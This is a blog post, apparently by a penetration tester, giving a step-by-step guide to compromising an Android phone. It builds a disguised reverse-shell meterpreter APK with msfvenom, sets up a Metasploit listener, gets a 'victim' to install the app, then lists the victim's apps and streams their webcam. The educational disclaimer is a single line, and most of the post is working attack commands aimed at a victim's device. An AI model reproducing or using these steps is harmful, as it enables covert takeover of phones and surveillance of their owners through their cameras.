Welcome you all for the series of blogs on penetration testing. Today we will look for How To hack any android Device. There are some techniques that we can really hack any Android device. So Today we will Learn How the Metasploit framework helps us to hack any Android device. This Content is Exclusively for educational purposes Don’t use this technique for illegal activities.
Setup Required:
System with Windows/ Linux/ Mac OS
Metasploit framework
We do this in our local environment for now, we can also do it globally by port forwarding technique
How we can hack any Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload apk file and setup listener to Metasploit framework which manipulate Us and we can access victim device
For those who don’t know what is metasploit Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Now, We will first creating a malicious apk file using MSFvenon which help us to access and get control any one device, Lets Do,
For making malicious apk file we will use command:
→ msfvenom -p android/meterpreter/reverse_tcp LHOST=Yourserverip LPORT=setport4444 R> Myfake.apk
As above Picture Now we have successfully created our payload for shell execute
Here -p Refer as payload always make sure to set Your local Host Server IP. Now, open the Metasploit framework by typing the command
→ msfconsole
Now we have successfully launched the Metasploit framework You can also open it by manually it default with Kali Linux
Now, Here we will use Metasploit MSF console that exploits and contains various modules for Android devices, Now we will setup Listener will use multi/handler for exploit by typing the command:
→ use exploit/multi/handler
Now, we need to set meterpreter/reverse_tcp which generates deep Listener here we will use the command:
→ set payload android/meterpreter/reverse_tcp
then we need to set LHOST to find lost type if config on your terminal,
Here we will set host by typing the command:
→ set LHOST
Then set LPORT By typing command:
→ set LPORT 4444
Now till here we have setup our malicious apk now it ready to send your victim and you can manipulate user device into your msfconsole session
Now, Turn For Another Step Now Install the Application that we have created Using msfvenonm
Victim Device
Now As above Picture we have installed malicious application that we have created Now,
Now, navigate to your msf console And to gaining access Victim Device by typing command:
→ exploit
As above picture we have successfully able to gaining access Our target Android Device Now, we have Successfully Stared meterpreter session.
Now, Use help command to see the functionality
→ help
Now, Check for all the application available On Our target android device here it will show all application packages , application name which inside on Our target android device
here we will use command:
→ app_list
Now, We can access Victim camera By Typing command :
→ webcam_list
As above picture We can access victim Camera By msfconsole to access victim webcam stream we will use command:
→ webcam_stream
As above picture Victim Webcam Live stream will Open Up on Our browser If victim running Webcam stream .
So we have successfully access control Our target Device using metasploit framework.
Download Metasploit: Download
Stick with our Blog series to learn more.
For more interesting topics please visit: https://securiumsolutions.com/
Author:
Pallab Jyoti Borah
VAPT Security Analyst
